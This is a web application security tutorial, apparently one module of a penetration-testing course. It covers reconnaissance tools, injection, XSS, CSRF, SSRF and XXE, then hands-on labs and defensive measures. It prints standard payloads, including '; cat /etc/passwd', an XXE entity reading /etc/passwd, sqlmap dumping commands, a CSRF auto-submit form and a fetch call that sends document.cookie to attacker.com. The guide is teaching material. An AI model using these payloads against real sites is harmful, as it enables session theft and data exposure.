Introduction to Web App Security
Web applications are prime targets for attackers due to their exposure to the internet. This guide covers vulnerabilities, exploitation techniques, and defenses.
1. Web App Reconnaissance
Information Gathering
- WHOIS Lookup (Domain details)
- Subdomain Enumeration (Sublist3r, Amass)
- Technology Stack Detection (Wappalyzer, BuiltWith)
- Directory Bruteforcing (Dirb, Gobuster)
- Wayback Machine (Historical snapshots)
Tools
bash
sublist3r -d example.com
wappalyzer.com
gobuster dir -u https://example.com -w /path/to/wordlist.txt
2. Common Web Vulnerabilities
A. Injection Attacks
1. SQL Injection (SQLi)
- Classic SQLi: ' OR 1=1 -- -
- Blind SQLi: Time-based/Boolean-based
Tools: SQLmap, Burp Suite
Example:
sql
SELECT * FROM users WHERE username = 'admin'--' AND password = ''
2. Command Injection
- Executing OS commands via input fields:
bash
; cat /etc/passwd
3. Cross-Site Scripting (XSS)
- Stored XSS : <script>alert(1)</script>
- Reflected XSS : https://example.com/search?q=<script>alert(1)</script>
- DOM XSS: Browser-side script execution
B. Broken Authentication
1. Credential Stuffing
- Using breached passwords
Tools : Hydra, Burp Intruder
2. Session Hijacking
- Stealing cookies via XSS/MITM
Tools : Ferret, Hamster
3. Default Credentials
- admin:admin , root:password
C. Sensitive Data Exposure
1. Insecure APIs
- Exposed API keys, tokens
Tools : Postman, Burp Suite
2. Directory Listing
- /backup, /admin accessible
D. Security Misconfigurations
1. Exposed Admin Panels
- /admin , /wp-admin
2. Verbose Error Messages
- Leaking stack traces, DB info
E. Cross-Site Request Forgery (CSRF)
- Forcing users to execute unwanted actions:
html
<img src="https://bank.com/transfer?amount=1000&to=attacker">
F. Server-Side Request Forgery (SSRF)
- Accessing internal services:
https://example.com/fetch?url=http://localhost
G. XML External Entity (XXE)
- Reading local files via XML:
xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
3. Exploitation Techniques
Step 1: Automated Scanning
- Burp Suite (Manual testing)
- OWASP ZAP (Automated scanning)
- Nikto (Vulnerability scanner)
Step 2: Manual Testing
- Intercepting requests (Burp Proxy)
- Tampering parameters (Headers, cookies)
- Fuzzing inputs (Wfuzz, FFUF)
Step 3: Post-Exploitation
- Privilege escalation
- Data exfiltration
- Persistence mechanisms
4. Hands-On Labs
Lab 1: SQL Injection with SQLmap
1. Find vulnerable parameter:
bash
sqlmap -u "https://example.com/login?id=1" --dbs
2. Dump database:
bash
sqlmap -u "https://example.com/login?id=1" -D dbname --tables
Lab 2: XSS Exploitation
1. Inject payload in search box:
html
<script>alert(document.cookie)</script>
2. Steal cookies:
javascript
fetch('https://attacker.com/log?cookie=' + document.cookie)
Lab 3: CSRF Attack
1. Craft malicious HTML:
html
<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>
5. Defensive Measures
Secure Coding Practices
- Input validation
- Prepared statements (SQLi)
- CSP headers (XSS)
- CSRF tokens
Security Tools
- WAFs (ModSecurity, Cloudflare)
- DAST/SAST Scanners (Checkmarx, SonarQube)
- Honeypots (Glastopf)
6. Bug Bounty & Ethical Hacking
Platforms : HackerOne, Bugcrowd
Methodology:
1. Recon
2. Vulnerability Scanning
3. Exploitation
4. Reporting
Conclusion
- Web app hacking involves recon, exploitation, and post-exploitation.
- OWASP Top 10 is a must-know for pentesters.
- Automated tools + manual testing = Best approach.
🔹 Next Steps:
Module 8: Wireless Network Hacking
- Practice on DVWA, WebGoat.
- Try HTB, TryHackMe web challenges.
- Learn advanced Burp Suite techniques.
Would you like a deep dive into bypassing WAFs? 🚀
0 Comments